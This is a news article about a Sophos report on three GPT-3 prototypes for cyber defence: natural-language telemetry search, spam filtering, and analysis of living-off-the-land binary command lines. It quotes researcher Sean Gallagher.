Sophos has released a new research that delves into how cybersecurity professionals can deploy the generative AI technology behind ChatGPT as a copilot to help fight malicious threats.
Sophos X-Ops researchers, including SophosAI principal data scientist Younghoo Lee, have been working on three prototype projects that show the potential of GPT-3 as an assistant to cybersecurity defenders.
All three use a technique called “few-shot learning” to train the AI model with just a few data samples, reducing the need to collect a large volume of pre-classified data.
Details of these projects are laid out in Sophos' latest report entitled “GPT for You and Me: Applying AI Language Processing to Cyber Defenses”. The report illustrates how GPT-3's large language models can be used to simplify the search for malicious activity in datasets from security software, more accurately filter spam, and speed up analysis of “living off the land” binary (LOLBin) attacks.
Since OpenAI unleashed ChatGPT in November, the security community has largely focused on the potential risks the new technology could bring: can the AI help wannabee attackers write malware or help cybercriminals write much more convincing phishing emails?
However, Sean Gallagher, principal threat researcher at Sophos, has a more optimistic view.
“At Sophos, we’ve long seen AI as an ally rather than an enemy for defenders, making it a cornerstone technology for Sophos, and GPT-3 is no different. The security community should be paying attention not just to the potential risks, but the potential opportunities GPT-3 brings.”
The first application Sophos tested with the few-shot learning method was a natural language query interface for sifting through malicious activity in security software telemetry.
Specifically, Sophos tested the model against its endpoint detection and response product. With this interface, defenders can filter through the telemetry with basic English commands, removing the need for defenders to understand SQL or a database’s underlying structure.
Next, Sophos tested a new spam filter using ChatGPT and found that, when compared to other machine learning models for spam filtering, the filter using GPT-3 was significantly more accurate.
Finally, Sophos researchers were able to create a program to simplify the process for reverse-engineering the command lines of LOLBins. Such reverse-engineering is notoriously difficult, but also critical for understanding LOLBins’ behaviour—and putting a stop to those types of attacks in the future.
“One of the growing concerns within security operation centers is the sheer amount of ‘noise’ coming in. There are just too many notifications and detections to sort through, and many companies are dealing with limited resources,” said Gallagher.
“We’ve proved that, with something like GPT-3, we can simplify certain labour-intensive processes and give back valuable time to defenders”
Sean Gallagher, Sophos
Sophos is already working to incorporate some of the prototypes into its products. The company has also made its results available on GitHub for those interested in testing GPT-3 in their own analysis environments.
“In the future, we believe that GPT-3 may very well become a standard co-pilot for security experts,” said Gallagher.